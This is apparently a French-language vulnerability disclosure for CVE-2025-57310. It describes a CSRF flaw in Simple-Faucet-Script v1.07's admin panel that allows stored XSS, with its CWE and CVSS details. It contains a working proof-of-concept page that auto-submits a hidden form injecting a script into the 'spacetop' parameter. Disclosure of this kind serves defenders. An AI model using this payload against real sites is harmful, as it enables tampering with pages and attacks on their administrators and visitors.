
Preuve de concept d'exploit pour CVE-2025-57310 : vulnérabilité CSRF dans Simple-Faucet-Script v1.07 permettant une XSS stockée via des requêtes POST conçues vers le panneau d'administration.
Une vulnérabilité de Cross-Site Request Forgery (CSRF) dans Salmen2/Simple-Faucet-Script v1.07 via une requête POST falsifiée vers admin.php?p=ads&c=1 permettant aux attaquants d'exécuter du code arbitraire.
CWE-352: Cross-Site Request Forgery (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Le produit est vulnérable à une attaque Cross-Site Request Forgery (CSRF) sur le panneau d'administration. Lorsqu'un administrateur authentifié visite une page malveillante contenant le PoC, l'attaque CSRF entraîne une modification non autorisée du contenu de la page d'accueil.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Un attaquant peut injecter du HTML/JavaScript arbitraire dans la page d'accueil via le paramètre spacetop, conduisant à un Cross-Site Scripting stocké (XSS).